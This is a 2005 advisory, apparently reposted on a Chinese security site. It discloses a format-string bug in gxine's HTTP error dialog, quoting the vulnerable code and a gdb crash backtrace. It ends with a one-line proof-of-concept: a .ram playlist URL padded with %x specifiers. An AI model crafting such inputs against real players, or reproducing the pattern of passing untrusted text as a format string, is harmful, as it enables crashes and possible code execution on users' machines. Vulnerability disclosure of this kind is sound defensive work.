• 当前位置:首页>>编程开发A>>安全防御>>pst.advisory : gxine remote exploitable . opensource is god .lol windows
  • pst.advisory : gxine remote exploitable . opensource is god .lol windows
  • 创建时间:2005-05-22 更新时间:2005-05-23
    文章属性:原创
    文章提交:jsk__ (jsk_at_ph4nt0m.org)

    gxine remote exploitable . opensource is god .lol windows


    Systems affected:

    gxine 0.44 0.43 0.42 0.41


    no affected

    no all exploitable


    1:why: it is a http hostname format strings vuln. new firefox can run gxine in many linux DS...


    so very dangerous!!!!!!





    2:tips:

    void v_display_message (const gchar *title, GtkMessageType type,
    const gchar *fmt, va_list ap)
    {
    GtkWidget *dialog;
    gchar *msg;
    gboolean modal = (fmt == NULL);

    if (modal)
    fmt = va_arg (ap, const gchar *);

    msg = g_strdup_vprintf (fmt, ap);
    va_end (ap);

    dialog = gtk_message_dialog_new (NULL, GTK_DIALOG_DESTROY_WITH_PARENT, type,
    GTK_BUTTONS_CLOSE, msg); boom ...GTK_BUTTONS_CLOSE,(((((%s))))) msg






    gtk_window_set_title (GTK_WINDOW (dialog), title);
    gtk_window_set_position (GTK_WINDOW (dialog), GTK_WIN_POS_CENTER);

    if (modal)
    gtk_window_set_modal (GTK_WINDOW(dialog), TRUE);

    g_signal_connect (G_OBJECT (dialog), "response",
    G_CALLBACK (response_cb), NULL);
    g_object_set_data (G_OBJECT (dialog), "msg", msg);
    gtk_widget_show (dialog);
    }


    v_display_message ()--- display_error" many other func" ()----display_error" many other func" ()
    ---report_error ()---http_open ()


    3:more show


    Program received signal SIGSEGV, Segmentation fault.
    0x405cdc43 in vfprintf () from /lib/libc.so.6
    (gdb) bt
    #0 0x405cdc43 in vfprintf () from /lib/libc.so.6
    #1 0x405ec976 in vasprintf () from /lib/libc.so.6
    #2 0x405493d7 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
    #3 0x40539674 in g_strdup_vprintf () from /usr/lib/libglib-2.0.so.0
    #4 0x40217391 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
    #5 0x0806dc83 in v_display_message ()
    #6 0x0806dda2 in display_error ()
    #7 0x0806cf45 in report_error ()
    #8 0x0806d278 in http_open ()
    Previous frame inner to this frame (corrupt stack?)
    (gdb) x/i $eip
    0x405cdc43 <vfprintf+10195>: mov %ecx,(%eax)


    4: A LAME proof-of-concept

    cat fmtexp.ram

    http://AAAAA%x%x%x%x%x%x%x%x%x%x%x%...paihb/42tj02.rm


    CREDIT:

    jsk:exworm (www.0xbadexworm.org) discovery this vulnerability

    ths: all members from PST and doris
  • 上一篇:pst.advisory: gedit fun. opensource is god .lol windows
    下一篇:Windows CE API机制初探